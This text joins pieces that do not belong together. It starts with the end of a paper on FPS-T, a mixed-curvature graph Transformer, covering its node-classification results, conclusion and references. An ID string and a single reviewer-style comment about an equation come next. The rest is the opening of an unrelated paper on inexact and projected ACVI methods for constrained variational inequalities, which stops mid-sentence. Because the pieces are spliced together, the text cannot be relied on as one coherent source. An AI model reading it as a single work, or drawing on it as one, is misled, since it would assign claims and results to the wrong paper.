(Zhu et al., 2020a). In other words, a heterophilic graph with small graph homophily requires capturing long-range interactions for proper labeling, which is naturally difficult for message passing-based approaches with small receptive fields. More detailed statistics on the networks can be found in Appendix D. Training. For all methods, we fix the embedding dimension to 16 and train each model to minimize the cross-entropy loss using an Adam optimizer with a learning rate of $1e^{-2}$. For models that use learnable curvatures (i.e., HGCN, κ-GCN and FPS-T), we use a learning rate of $1e^{-4}$ for the curvatures. The optimal number of layers, activation function, dropout rate, and weight decay of each method are chosen via grid search on each dataset. Details on the hyperparameter search-space and dataset splits can be found in Appendix E.2. Results. Table 2 shows the results from node classification. Overall, our method attains best accuracy on 6 out of 8 datasets, showing that FPS-T is effective across networks with various graph homophily. In case of heterophilic networks, we find that the small receptive fields of message-passing GCNs are extremely inadequate, often being outperformed by a simple MLP that completely ignores the graph connectivity. On the other hand, FPS-T consistently outperforms MLP as well as GCN baselines, due to its ability to exchange information across long distances via global-attention. It also significantly outperforms TOKENGT by 8.3% on Actor, showing that adjusting the geometry towards non-Euclidean can further enhance predictive performance. In homophilic networks where message-passing is more well-suited, FPS-T shows competitive performance against GCN baselines. This is expected as FPS-T enjoys the same capacity as TOKENGT to mimic any order-2 equivariant bases (Kim et al., 2022), which includes local message-passing, through attention score computation. 6 CONCLUSION We propose FPS-T, a natural generalization of the Transformer architecture towards mixed-curvature spaces with learnable curvatures. When combined with the graph tokenization technique of Kim et al. (2022), our model can embed graphs with less distortion and higher parameter-efficiency than its Euclidean counterpart by operating on the product-stereographic model. We also show that our model outperforms existing hyperbolic and mixed-curvature message-passing GCN baselines on node classification via global-attention that can capture long-range interactions. By linearizing the cost of self-attention through kernelized approximation, FPS-T runs in cost linear to the number of nodes and edges, allowing practical use on large-scale networks. For future work, we plan to extend towards heterogeneous manifolds (Giovanni et al., 2022) with input-dependent sectional curvatures and also optimize Riemannian operations towards better stability and efficiency under finite precision. As we propose a foundational generalization of the Transformer architecture, investigating what geometry suits best for various tasks in the NLP and CV domain would also be an interesting direction. REFERENCES Uri Alon and Eran Yahav. On the bottleneck of graph neural networks and its practical implications. *arXiv preprint arXiv:2006.05205*, 2020. Gregor Bachmann, Gary Bécigneul, and Octavian Ganea. Constant curvature graph convolutional networks. In *International Conference on Machine Learning*, pp. 486–496. PMLR, 2020. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. *Advances in neural information processing systems*, 33:1877–1901, 2020. Chen Cai and Yusu Wang. A note on over-smoothing for graph neural networks. *arXiv preprint arXiv:2006.13318*, 2020. Ines Chami, Zhiqiao Ying, Christopher Ré, and Jure Leskovec. Hyperbolic graph convolutional neural networks. *Advances in neural information processing systems*, 32, 2019. Ara Cho, Junha Shin, Sohyun Hwang, Chanyoung Kim, Hongseok Shim, Hyojin Kim, Hanhae Kim, and Insuk Lee. WormNet v3: a network-assisted hypothesis-generating server for Caenorhabditis elegans. *Nucleic Acids Research*, 42(W1):W76–W82, 05 2014. ISSN 0305-1048. doi: 10.1093/nar/gku367. URL https://doi.org/10.1093/nar/gku367. Sungjun Cho, Seonwoo Min, Jinwoo Kim, Moontae Lee, Honglak Lee, and Seunghoon Hong. Transformers meet stochastic block models: Attention with data-adaptive sparsity and cost. *arXiv preprint arXiv:2210.15541*, 2022. Krzysztof Choromanski, Valerii Likhosherstov, David Dohan, Xingyou Song, Andreea Gane, Tamas Sarlos, Peter Hawkins, Jared Davis, Afroz Mohiuddin, Lukasz Kaiser, et al. Rethinking attention with performers. *arXiv preprint arXiv:2009.14794*, 2020. Mark Craven, Andrew McCallum, Dan PiPasquo, Tom Mitchell, and Dayne Freitag. Learning to extract symbolic knowledge from the world wide web. Technical report, Carnegie-mellon univ pittsburgh pa school of computer Science, 1998. Calin Cruceru, Gary Bécigneul, and Octavian-Eugen Ganea. Computationally tractable riemannian manifolds for graph embeddings. In *Proceedings of the AAAI Conference on Artificial Intelligence*, volume 35, pp. 7133–7141, 2021. Michaël Defferrard, Martino Milanî, Frédérick Gusset, and Nathanaël Perraudin. Deepsphere: a graph-based spherical cnn. In *International Conference on Learning Representations*, 2020. URL https://openreview.net/forum?id=Ble3OlStPB. Cheng Deng, Fan Xu, Jiaxing Ding, Luoyi Fu, Weinan Zhang, and Xinbing Wang. Fmgnn: Fused manifold graph neural network. *arXiv preprint arXiv:2304.01081*, 2023. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. Bert: Pre-training of deep bidirectional transformers for language understanding. *arXiv preprint arXiv:1810.04805*, 2018. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. *arXiv preprint arXiv:2010.11929*, 2020. Vijay Prakash Dwivedi and Xavier Bresson. A generalization of transformer networks to graphs. *arXiv preprint arXiv:2012.09699*, 2020. Vijay Prakash Dwivedi, Ladislav Rampášek, Michael Galkin, Ali Parviz, Guy Wolf, Anh Tuan Luu, and Dominique Beaini. Long range graph benchmark. *Advances in Neural Information Processing Systems*, 35:22326–22340, 2022. Jiarui Feng, Yixin Chen, Fuhai Li, Anindya Sarkar, and Muhan Zhang. How powerful are k-hop message passing graph neural networks. *arXiv preprint arXiv:2205.13328*, 2022.
RsztjXcvUf
It seems to me that equation (14) is one of the crucial steps: it avoids Lemma 1 in Yang et al, where the gap is bounded as a function of the distance to the optimal VI solution. However, I struggle to see where/how exactly the improvements were achieved.
A Primal-Dual Approach to Solving Variational Inequalities with General Constraints Tatjana Chavdarova∗ University of California, Berkeley [email protected] Matteo Pagliardini University of California, Berkeley & EPFL [email protected] Tong Yang∗ Carnegie Mellon University [email protected] Michael I. Jordan University of California, Berkeley [email protected] Abstract Yang et al. (2023) recently showed how to use first-order gradient methods to solve general variational inequalities (VIs) under a limiting assumption that analytic solutions of specific subproblems are available. In this paper, we circumvent this assumption via a warm-starting technique where we solve subproblems approximately and initialize variables with the approximate solution found at the previous iteration. We prove the convergence of this method and show that the gap function of the last iterate of the method decreases at a rate of $O(\frac{1}{\sqrt{k}})$ when the operator is $L$-Lipschitz and monotone. In numerical experiments, we show that this technique can converge much faster than its exact counterpart. Furthermore, for the cases when the inequality constraints are simple, we introduce an alternative variant of ACVI and establish its convergence under the same conditions. Finally, we relax the smoothness assumptions in Yang et al., yielding, to our knowledge, the first convergence result for VIs with general constraints that does not rely on the assumption that the operator is $L$-Lipschitz. 1 Introduction We study variational inequalities (VIs), a general class of problems that encompasses both equilibria and optima. The general (constrained) VI problem involves finding a point $x^* \in X$ such that: $$\langle x - x^*, F(x^*) \rangle \geq 0, \quad \forall x \in X,$$ (cVI) where $X$ is a subset of the Euclidean $n$-dimensional space $\mathbb{R}^n$, and where $F : X \mapsto \mathbb{R}^n$ is a continuous map. VIs generalize standard constrained minimization problems, where $F$ is a gradient field $F \equiv \nabla f$, and, by allowing $F$ to be a general vector field, they also include problems such as finding equilibria in zero-sum games and general-sum games (Cottle & Dantzig, 1968; Rockafellar, 1970). This increased expressivity underlies their practical relevance to a wide range of emerging applications in machine learning, such as (i) multi-agent games (Goodfellow et al., 2014; Vinyals et al., 2017), (ii) robustification of single-objective problems, which yields min-max formulations (Szegedy et al., 2014; Mazuelas et al., 2020; Christiansen et al., 2020; Rothenhäusler et al., 2018), and (iii) statistical approaches to modeling complex multi-agent dynamics in stochastic and adversarial environments. We refer the reader to (Facchinei & Pang, 2003; Yang et al., 2023) for further examples. Such generality comes, however, at a price in that solving for equilibria is notably more challenging than solving for optima. In particular, as the Jacobian of $F$ is not necessarily symmetric, we may have rotational trajectories or limit cycles (Korpelevich, 1976; Hsieh et al., 2021). Moreover, in sharp contrast to standard minimization, the last iterate can be quite far from the solution even though the average iterate converges to the solution (Chavdarova et al., 2019). This has motivated recent efforts ∗Equal contribution. Source code: https://github.com/Chavdarova/I-ACVI. to study specifically the convergence of the last iterate produced by gradient-based methods. Thus, herein, our focus and discussions refer to the last iterate. Recent work has focused primarily on solving VIs in two cases of the domain $\mathcal{X}$: (i) the unconstrained setting where $\mathcal{X} \equiv \mathbb{R}^n$ (Golowich et al., 2020b; Chavdarova et al., 2023; Gorbunov et al., 2022a; Bot et al., 2022) and for (ii) the constrained setting with projection-based methods (Tseng, 1995; Daskalakis et al., 2018; Diakonikolas, 2020; Nemirovski, 2004; Mertikopoulos et al., 2019; Cai et al., 2022). The latter approach assumes that the projection is “simple,” in the sense that this step does not require gradient computation. This holds, for example, for inequality constraints of the form $x \leq \tau$ where $\tau$ is some constant, in which case fast operations such as clipping suffice. However, as is the case in constrained minimization, the constraint set—denoted herein with $\mathcal{C} \subseteq \mathcal{X}$—is, in the general case, an intersection of finitely many inequalities and linear equalities: $$\mathcal{C} = \{ x \in \mathbb{R}^n | \varphi_i(x) \leq 0, i \in [m], \ Cx = d \},$$ (CS) where each $\varphi_i : \mathbb{R}^n \mapsto \mathbb{R}$, $C \in \mathbb{R}^{p \times n}$, and $d \in \mathbb{R}^p$. Given a general CS (without assuming additional structure), implementing the projection requires second-order methods, which quickly become computationally prohibitive as the dimension $n$ increases. If the second-order derivative computation is approximated, the derived convergence rates will yet be multiplied with an additional factor; thus, the resulting rate of convergence may not match the known lower bound (Golowich et al., 2020a; Cai et al., 2022). This motivates a third thread of research, focusing on projection-free methods for the constrained VI problem, where the update rule does not rely on the projection operator. This is the case we focus on in this paper. There has been significant work on developing second-order projection-free methods for the formulation in cVI; we refer the interested reader to (Chapter 7, Nesterov & Nemirovski, 1994) and (Chapter 11, Facchinei & Pang, 2003, vol. 2) for example. We remark that the seminal mirror-descent and mirror-prox methods (Nemirovski & Yudin, 1983; Beck & Teboulle, 2003; Nemirovski, 2004) (see App. A.5) exploit a certain structure of the domain and avoid the projection operator, but cannot be applied for general CS. In recent work, Yang et al. (2023) presented a first-order method, referred to as the ADMM-based Interior Point Method for Constrained VIs (ACVI), for solving the cVI problem with general constraints. ACVI combines path-following interior point (IP) methods and primal-dual methods. Regarding the latter, it generalizes the alternating direction method of multipliers (ADMM) method (Glowinski & Marroco, 1975; Gabay & Mercier, 1976), an algorithmic paradigm that is central to large-scale optimization (Boyd et al., 2011; Tibshirani, 2017)—see (Yang et al., 2023) and App. A.1; but which has been little explored in the cVI context. On a high level, ACVI has two nested loops: (i) the outer loop smoothly decreases the weight $\mu_i$ of the inequality constraints as in IP methods, whereas (ii) the inner loop performs a primal-dual update (for a fixed $\mu_i$) as follows: - solve a subproblem whose main (primal) variable $x_j^i$ aims to satisfy the equality constraints, - solve a subproblem whose main (primal) variable $y_j^i$ aims to satisfy the inequality constraints, - update the dual variable $\lambda_j^i$. The first two steps solve the subproblems exactly using an analytical expression of the solution, and the variables converge to the same value, thus eventually satisfying both the inequality and equality constraints. See Algorithm 3 for a full description, and see Fig. 2 for illustrative examples. The authors documented that projection-based methods may extensively zig-zag when hitting a constraint when there is a rotational component in the vector field, an observation that further motivates projection-free approaches even when the projection is simple. Yang et al. showed that the gap function of the last iterate of ACVI decreases at a rate of $\mathcal{O}(1/\sqrt{K})$ when the operator is $L$-Lipschitz, monotone, and at least one constraint is active. It is, however, an open problem to determine if the same rate on the gap function applies while assuming only that the operator is monotone (where monotonicity for VIs is analogous to convexity for standard minimization, see Def. 2.1). Moreover, in some cases, the subproblems of ACVI may be cumbersome to solve analytically. Hence, a natural question is whether we can show convergence approximately when the subproblems are solved. As a result, we raise the following questions: - Does the last iterate of ACVI converge when the operator is monotone without requiring it to be $L$-Lipschitz? Does ACVI converge when the subproblems are solved approximately? In this paper, we answer the former question affirmatively. Specifically, we prove that the last iterate of ACVI converges at a rate of $\mathcal{O}\left(\frac{1}{\sqrt{K}}\right)$ in terms of the gap function (Def. 2.2) even when assuming only the monotonicity of the operator. The core of our analysis lies in identifying a relationship between the reference point of the gap function and a KKT point that ACVI targets implicitly (i.e., it does not appear explicitly in the ACVI algorithm). This shows that ACVI explicitly works to decrease the gap function at each iteration. The argument further allows us to determine a convergence rate by making it possible to upper bound the gap function. This is in contrast to the approach of Yang et al. (2023), who upper bound the iterate distance and then the gap function, an approach that requires a Lipschitz assumption. This is the first convergence rate for the last iterate for monotone VIs with constraints that does not rely on an $L$-Lipschitz assumption on the operator. To address the latter question, we leverage a fundamental property of the ACVI algorithm—namely, its homotopic structure as it smoothly transitions to the original problem, a homotopy that inherently arises from its origin as an interior-point method (Boyd & Vandenberghe, 2004). Moreover, due to the alternating updates of the two sets of parameters of ACVI ($x$ and $y$; see Algorithm 3), the subproblems change negligibly, with the changes proportional to the step sizes. This motivates the standard warm-start technique where, at every iteration, instead of initializing at random, we initialize the corresponding optimization variable with the approximate solution found at the previous iteration. We refer to the resulting algorithm as inexact ACVI, described in Algorithm 1. Furthermore, inspired by the work of Schmidt et al. (2011), which focuses on the proximal gradient method for standard minimization, we prove that inexact ACVI converges with the same rate of $\mathcal{O}\left(\frac{1}{\sqrt{K}}\right)$, under a condition on the rate of decrease of the approximation errors. We evaluate inexact ACVI empirically on 2D and high-dimensional games and show how multiple inexact yet computationally efficient iterations can lead to faster wall-clock convergence than fewer exact ones. Finally, we provide a detailed study of a special case of the problem class that ACVI can solve. In particular, we focus on the case when the inequality constraints are simple, in the sense that projection on those inequalities is fast to compute. Such problems often arise in machine learning, e.g., whenever the constraint set is an $L_p$-ball, with $p \in \{1, 2, \infty\}$ as in adversarial training (Goodfellow et al., 2015). We show that the same convergence rate holds for this variant of ACVI. Moreover, we show empirically that when using this method to train a constrained GAN on the MNIST (Lecun & Cortes, 1998) dataset, it converges faster than the projected variants of the standard VI methods. In summary, our main contributions are as follows: - We show that the gap function of the last iterate of ACVI (Yang et al., 2023, Algorithm 1 therein) decreases at a rate of $\mathcal{O}\left(\frac{1}{\sqrt{K}}\right)$ for monotone VIs, without relying on the assumption that the operator is $L$-Lipschitz. - We combine a standard warm-start technique with ACVI and propose a precise variant with approximate solutions, named inexact ACVI—see Algorithm 1. We show that inexact ACVI recovers the same convergence rate as ACVI, provided that the errors decrease at appropriate rates. - We propose a variant of ACVI designed for inequality constraints that are fast to project to—see Algorithm 2. We guarantee its convergence and provide the corresponding rate; in this case, we omit the central path, simplifying the convergence analysis. - Empirically, we: (i) verify the benefits of warm-start of the inexact ACVI; (ii) observe that I-ACVI can be faster than other methods by taking advantage of cheaper approximate steps; (iii) train a constrained GAN on MNIST and show the projected version of ACVI is faster to converge than other methods; and (iv) provide visualizations contrasting the different ACVI variants. 1.1 Related Works Last-iterate convergence of first-order methods on VI-related problems. When solving VIs, the last and average iterates can be far apart; see examples in (Chavdarova et al., 2019). Thus, an extensive line of work has aimed at obtaining last-iterate convergence for special cases of VIs that are important in applications, including bilinear or strongly monotone games (e.g., Tseng, 1995; Malitsky, 2015; Facchinei & Pang, 2003; Daskalakis et al., 2018; Liang & Stokes, 2019; Gidel et al., 2019b; Azizian et al., 2020; Thekumparampil et al., 2022), and VIs with cocoercive operators (Diakonikolas, 2020). Several papers exploit continuous-time analyses as these provide direct insights on last-iterate convergence and simplify the derivation of the Lyapunov potential function (Ryu et al., 2019; Bot et al., 2020; Rosca et al., 2021; Chavdarova et al., 2023; Bot et al., 2022). For monotone VIs, (i) Golowich et al. (2020b,a) established that the lower bound of $\tilde{p}$-stationary canonical linear iterative ($\tilde{p}$-SCLI) first-order methods (Arjevani et al., 2016) is $O(\frac{1}{\tilde{p}\sqrt{K}})$, (ii) Golowich et al. (2020b) obtained a rate in terms of the gap function, relying on first- and second-order smoothness of $F$, (iii) Gorbunov et al. (2022a) and Gorbunov et al. (2022b) obtained a rate of $O(\frac{1}{K})$ for extragradient (Korpelevich, 1976) and optimistic GDA (Popov, 1980), respectively—in terms of reducing the squared norm of the operator, relying on first-order smoothness of $F$, and (iv) Golowich et al. (2020b) and Chavdarova et al. (2023) provided the best iterate rate for OGDA while assuming first-order smoothness of $F$. Daskalakis & Panageas (2019) focused on zero-sum convex-concave constrained problems and provided an asymptotic convergence guarantee for the last iterate of the optimistic multiplicative weights update (OMWU) method. For constrained and monotone VIs with $L$-Lipschitz operator, Cai et al. (2022) recently showed that the last iterate of extragradient and optimistic GDA have a rate of convergence that matches the lower bound. Gidel et al. (2017) consider strongly convex-concave zero-sum games with strongly convex constraint set to study the convergence of the Frank-Wolfe method (Lacoste-Julien & Jaggi, 2015). **Interior point (IP) methods for VIs.** IP methods are a broad class of algorithms for solving problems constrained by general inequality and equality constraints. One of the widely adopted subclasses within IP methods utilizes log-barrier terms to handle inequality constraints. They typically rely on Newton’s method, which iteratively approaches the solution from the feasible region. Several works extend IP methods for constrained VI problems. Among these, Nesterov & Nemirovski (Chapter 7, 1994) study extensions to VI problems while relying on Newton’s method. Further, an extensive line of work discusses specific settings (e.g., Chen et al., 1998; Qi & Sun, 2002; Qi et al., 2000; Fan & Yan, 2010). On the other hand, Goffin et al. (1997) described a second-order cutting-plane method for solving pseudomonotone VIs with linear inequalities. Although these methods enjoy fast convergence regarding the number of iterations, each iteration requires computing second-order derivatives, which becomes computationally prohibitive for large-scale problems. Recently, Yang et al. (2023) derived the aforementioned ACVI method which combines IP methods and the ADMM method, resulting in a first-order method that can handle general constraints. ## Preliminaries **Notation.** Bold small and bold capital letters denote vectors and matrices, respectively, while curly capital letters denote sets. We let $[n]$ denote $\{1, \ldots, n\}$ and let $e$ denote vector of all 1’s. The Euclidean norm of $v$ is denoted by $\|v\|$, and the inner product in Euclidean space by $\langle \cdot, \cdot \rangle$. ⊙ denotes element-wise product. **Problem.** Let $\text{rank}(C') = p$ be the rank of $C$ as per (CS). With abuse of notation, let $\varphi$ be the concatenated $\varphi_i(\cdot), i \in [m]$. We assume that each of the inequality constraints is convex and $\varphi_i \in C^1(\mathbb{R}^n), i \in [m]$. We define the following sets: $$C_\leq \triangleq \{x \in \mathbb{R}^n | \varphi(x) \leq 0\}, \quad C_< \triangleq \{x \in \mathbb{R}^n | \varphi(x) < 0\}, \quad \text{and} \quad C_+ \triangleq \{y \in \mathbb{R}^n | Cy = d\};$$ thus the relative interior of $C$ is $\text{int } C \triangleq C_< \cap C_+$. We assume $\text{int } C \neq \emptyset$ and that $C$ is compact. In the following, we list the necessary definitions and assumptions; see App. A for additional background. We define these for a general domain set $S$, and by setting $S \equiv \mathbb{R}^n$ and $S \equiv X$, these refer to the unconstrained and constrained settings, respectively. We will use the standard gap function as a convergence measure, which requires $S$ to be compact to define it. **Definition 2.1 (monotone operators).** An operator $F : X \supseteq S \to \mathbb{R}^n$ is monotone on $S$ if and only if the following inequality holds for all $x, x' \in S$: $\langle x - x', F(x) - F(x') \rangle \geq 0$. **Definition 2.2 (gap function).** Given a candidate point $x' \in X$ and a map $F : X \supseteq S \to \mathbb{R}^n$ where $S$ is compact, the gap function $G : \mathbb{R}^n \to \mathbb{R}$ is defined as: $G(x', S) \triangleq \max_{x \in S} \langle F(x'), x' - x \rangle$. **Definition 2.3 ($\sigma$-approximate solution).** Given a map $F : X \to \mathbb{R}^n$ and a positive scalar $\sigma$, $x \in X$ is said to be a $\sigma$-approximate solution of $F(x) = 0$ iff $\|F(x)\| \leq \sigma$. **Definition 2.4 ($\varepsilon$-minimizer).** Given a minimization problem $\min_x h(x)$, s.t. $x \in S$, and a fixed positive scalar $\varepsilon$, a point $\hat{x} \in S$ is said to be an $\varepsilon$-minimizer of this problem if and only if it holds that: $h(\hat{x}) \leq h(x) + \varepsilon, \forall x \in S$. Figure 1: Convergence of ACVI and I-ACVI on the (2D-BG) problem. The central path is depicted in yellow. For all methods, we show the $y$-iterates initialized at the same point (blue circle). Each subsequent point on the trajectory depicts the (exact or approximate) solution at the end of the inner loop. A yellow star represents the game’s Nash equilibrium (NE), and the constraint set is the interior of the red square. (a): As we decay $\mu_t$, the solutions of the inner loop of ACVI follow the central path. As $\mu_t \to 0$, the solution of the inner loop of ACVI converges to the NE. (b, c, d): When the $x$ and $y$ subproblems are solved approximately with a finite $K$ and $\ell$, the iterates need not converge as the approximation error increases (and $K$ decreases). See § 5 for a discussion. Algorithm 1 Inexact ACVI (I-ACVI) pseudocode. 1: **Input:** operator $F : X \to \mathbb{R}^n$, constraints $Cx = d$ and $\varphi_i(x) \leq 0, i = [m]$, hyperparameters $\mu_{-1}, \beta > 0, \delta \in (0, 1)$, barrier map $\wp (\wp_1$ or $\wp_2)$, inner optimizers $A_x$ (e.g. EG, GDA) and $A_y$ (GD) for the $x$ and $y$ subproblems, resp.; outer and inner loop iterations $T$ and $K$, resp. 2: **Initialize:** $x^{(0)}_0 \in \mathbb{R}^n, y^{(0)}_0 \in \mathbb{R}^n, \lambda^{(0)}_0 \in \mathbb{R}^n$ 3: $P_c \triangleq I - C(C^TC)^{-1}C$ where $P_c \in \mathbb{R}^{n \times n}$ 4: $d_c \triangleq C^T(CC^T)^{-1}d$ where $d_c \in \mathbb{R}^n$ 5: **for** $t = 0, \ldots, T - 1$ **do** 6: $\mu_t = \delta \mu_{t-1}$ 7: **for** $k = 0, \ldots, K - 1$ **do** 8: Set $x^{(t)}_{k+1}$ to be a $\sigma_{k+1}$-approximate solution of: $x + \frac{1}{\beta} P_c F(x) - P_c y^{(t)}_k + \frac{1}{\beta} P_c \lambda^{(t)}_k - d_c = 0$ (w.r.t. $x$), by running $\ell^{(t)}_x$ steps of $A_x$, with $x$ initialized to the previous solution ($x^{(t)}_k$ if $k > 0$, else $x^{(t-1)}_K$) 9: Set $y^{(t)}_{k+1}$ to be an $\varepsilon_{k+1}$-minimizer of $\min_y \sum_{i=1}^m \wp(\varphi_i(y), \mu) + \frac{\beta}{2} \| y - x^{(t)}_{k+1} - \frac{1}{\beta} \lambda^{(t)}_k \|^2$, by running $\ell^{(t)}_y$ steps of $A_y$, with $y$ initialized to $y^{(t)}_k$ when $k > 0$, or $y^{(t-1)}_K$ otherwise 10: $\lambda^{(t)}_{k+1} = \lambda^{(t)}_k + \beta (x^{(t)}_{k+1} - y^{(t)}_{k+1})$ 11: **end for** 12: $(y^{(t+1)}_0, \lambda^{(t+1)}_0) \triangleq (y^{(t)}_K, \lambda^{(t)}_K)$ 13: **end for** 3 Convergence of the Exact and Inexact ACVI Algorithms for Monotone VIs In this section, we present our main theoretical findings: (i) the rate of convergence of the last iterate of ACVI (the exact ACVI algorithm is stated in App. A) while relying exclusively on the assumption that the operator $F$ is monotone; and (ii) the corresponding convergence when the subproblems are solved approximately—where the proposed algorithm is referred to as inexact ACVI—Algorithm 1 ($\wp_1, \wp_2$ are defined below). Note that we only assume $F$ is $L$-Lipschitz for the latter result, and if we run Algorithm 1 with extragradient for line 8, for example, the method only has a convergence guarantee if $F$ is $L$-Lipschitz (see Korpelevich, 1976, Theorem 1). For easier comparison with one loop algorithms, we will state both of these results for a fixed $\mu_{-1}$ (hence only have the $k \in [K]$ iteration count) as in (Yang et al., 2023); nonetheless, the same rates hold without knowing $\mu_{-1}$—see App. B.4 in Yang et al. (2023) and our App. B.3. Thus, both guarantees are parameter-free. 3.1 Last Iterate Convergence of Exact ACVI **Theorem 3.1** (Last iterate convergence rate of ACVI—Algorithm 1 in (Yang et al., 2023)). Given a continuous operator \( F : \mathcal{X} \to \mathbb{R}^n \), assume: (i) \( F \) is monotone on \( C_- \), as per Def. 2.1; (ii) either \( F \) is strictly monotone on \( C \) or one of \( \varphi_i \) is strictly convex. Let \( (\mathbf{x}_K^{(t)}, \mathbf{y}_K^{(t)}, \lambda_K^{(t)}) \) denote the last iterate of ACVI. Given any fixed \( K \in \mathbb{N}_+ \), run with sufficiently small \( \mu_{-1} \), then \( \forall t \in [T] \), it holds that: \[ G(\mathbf{x}_K^{(t)}, C) \leq O\left(\frac{1}{\sqrt{K}}\right), \quad \text{and} \quad \left\| \mathbf{x}_K^{(t)} - \mathbf{y}_K^{(t)} \right\| \leq O\left(\frac{1}{\sqrt{K}}\right). \] App. B gives the details on the constants that appear in the rates and the proof of Theorem 3.1. 3.2 Last Iterate Convergence Rate of Inexact ACVI For some problems, the equation in line 8 or the convex optimization problem in line 9 of ACVI may not have an analytic solution, or the exact solution may be expensive to compute. Thus we consider solving these two problems approximately, using warm-starting. At each iteration, we set the initial variable \( \mathbf{x} \) and \( \mathbf{y} \) to be the solution at the previous step when solving the \( \mathbf{x} \) and \( \mathbf{y} \) subproblems, respectively, as described in Algorithm 1. The following Theorem—inspired by (Schmidt et al., 2011)—establishes that when the errors in the calculation of the subproblems satisfy certain conditions, the last iterate convergence rate of inexact ACVI recovers that of (exact) ACVI. The theorem holds for the standard barrier function used for IP methods, as well as for a new barrier function \( \varphi_2 \) that we propose that is smooth and defined in the entire domain, as follows: \[ \varphi_1(z, \mu) = -\mu \log(-z), \quad \varphi_2(z, \mu) = \begin{cases} -\mu \log(-z), & z \leq -e^{-\frac{\mu}{c}} \\ \mu e^{\frac{\mu}{c}} z + \mu + c, & \text{otherwise} \end{cases} \] where \( c \) in \( \varphi_2 \) is a fixed constant. Choosing among these is denoted with \( \varphi(\cdot) \) in Algorithm 1. **Theorem 3.2** (Last iterate convergence rate of Inexact ACVI—Algorithm 1 with \( \varphi_1 \) or \( \varphi_2 \)). Given a continuous operator \( F : \mathcal{X} \to \mathbb{R}^n \), assume: (i) \( F \) is monotone on \( C_- \), as per Def. 2.1; (ii) either \( F \) is strictly monotone on \( C \) or one of \( \varphi_i \) is strictly convex; and (iii) \( F \) is \( L \)-Lipschitz on \( \mathcal{X} \), that is, \( \|F(\mathbf{x}) - F(\mathbf{x'})\| \leq L \|\mathbf{x} - \mathbf{x'}\| \), for all \( \mathbf{x}, \mathbf{x'} \in \mathcal{X} \) and some \( L > 0 \). Let \( (\mathbf{x}_K^{(t)}, \mathbf{y}_K^{(t)}, \lambda_K^{(t)}) \) denote the last iterate of Algorithm 1; and let \( \varepsilon_k \) and \( \sigma_k \) denote the approximation errors at step \( k \) of lines 8 and 9 (as per Def. 2.3 and 2.4), respectively. Further, suppose: \( \lim_{K \to \infty} \frac{1}{\sqrt{K}} \sum_{k=1}^{K+1} (k(\sqrt{\varepsilon_k} + \sigma_k)) < +\infty \). Given any fixed \( K \in \mathbb{N}_+ \), run with sufficiently small \( \mu_{-1} \), then for all \( t \in [T] \), it holds: \[ G(\mathbf{x}_K^{(t)}, C) \leq O\left(\frac{1}{\sqrt{K}}\right), \quad \text{and} \quad \left\| \mathbf{x}_K^{(t)} - \mathbf{y}_K^{(t)} \right\| \leq O\left(\frac{1}{\sqrt{K}}\right). \] As is the case for Theorem 3.1, Theorem 3.2 gives a nonasymptotic convergence guarantee. While the condition involving the sequences \( \{\varepsilon_k\}_{k=1}^{K+1} \) and \( \{\sigma_k\}_{k=1}^{K+1} \) requires the given expression to be summable, the convergence rate is nonasymptotic as it holds for any \( K \). App. B gives details on the constants in the rates of Theorem 3.2, provides the proof, and also discusses the algorithms \( A_x, A_y \) for the sub-problems that satisfy the conditions. App. C discusses further details of the implementation of Algorithm 1; and we will analyze the effect of warm-starting in § 5. 4 Specialization of ACVI for Simple Inequality Constraints We now consider that the inequality constraints are simple in that the projection is fast to compute. This scenario frequently occurs in machine learning, particularly when dealing with \( L_\infty \)-ball constraints, for instance. Projections onto the \( L_2 \) and \( L_1 \)-balls can also be obtained efficiently through simple normalization for \( L_2 \) and a \( O(n \log(n)) \) algorithm for \( L_1 \) (Duchi et al., 2008). In ACVI, we have the flexibility to substitute the \( y \)-subproblem with a projection onto the set defined by the inequalities. The \( x \)-subproblem still accounts for equality constraints, and if there are none, this simplifies the \( x \)-subproblem further since \( P_c \equiv I \), and \( d_c \equiv 0 \). Projection-based methods cannot leverage this structural advantage of simple inequality constraints as the intersection with the equality constraints can be nontrivial. **The P-ACVI Algorithm:** omitting the log barrier. Assume that the provided inequality constraints can be met efficiently through a projection \( \Pi_C(\cdot) : \mathbb{R}^n \to C_- \). In that case, we no longer need the log barrier, and we omit \( \mu \) and the outer loop of ACVI over \( t \in [T] \). Differentiating the remaining expression of the \( y \) subproblem with respect to \( y \) and setting it to zero gives: Algorithm 2 P-ACVI: ACVI with simple inequalities. 1: **Input:** operator $F : \mathcal{X} \to \mathbb{R}^n$, constraints $Cx = d$ and projection operator $\Pi_\leq$ for the inequality constraints, hyperparameter $\beta > 0$, and number of iterations $K$. 2: **Initialize:** $y_0 \in \mathbb{R}^n$, $\lambda_0 \in \mathbb{R}^n$ 3: $P_c \triangleq I - C(C^\top C)^{-1}C$ where $P_c \in \mathbb{R}^{n \times n}$ 4: $d_c \triangleq C^\top (CC^\top)^{-1}d$ where $d_c \in \mathbb{R}^n$ 5: **for** $k = 0, \ldots, K - 1$ **do** 6: Set $x_{k+1}$ to be the solution of: $x + \frac{1}{\beta} P_c F(x) - P_c y_k + \frac{1}{\beta} P_c \lambda_k - d_c = 0$ (w.r.t. $x$) 7: $y_{k+1} = \Pi_\leq(x_{k+1} + \frac{1}{\beta} \lambda_k)$ 8: $\lambda_{k+1} = \lambda_k + \beta(x_{k+1} - y_{k+1})$ 9: **end for** $$\text{argmin}_y \frac{\beta}{2} \|y - x_{k+1} - \frac{1}{\beta} \lambda_k\|^2 = x_{k+1} + \frac{1}{\beta} \lambda_k.$$ This implies that line 9 of the exact ACVI algorithm (given in App. A) can be replaced with the solution of the $y$ problem without the inequality constraints, and we can cheaply project to satisfy the inequality constraints, as follows: $y_{k+1} = \Pi_\leq(x_{k+1} + \frac{1}{\beta} \lambda_k)$, where the $\varphi_i(\cdot)$ are included in the projection. We describe the resulting procedure in Algorithm 2 and refer to it as P-ACVI. In this scenario with simple $\varphi_i$, the $y$ problem is always solved exactly; nonetheless, when the $x$-subproblem is also solved approximately, we refer to it as 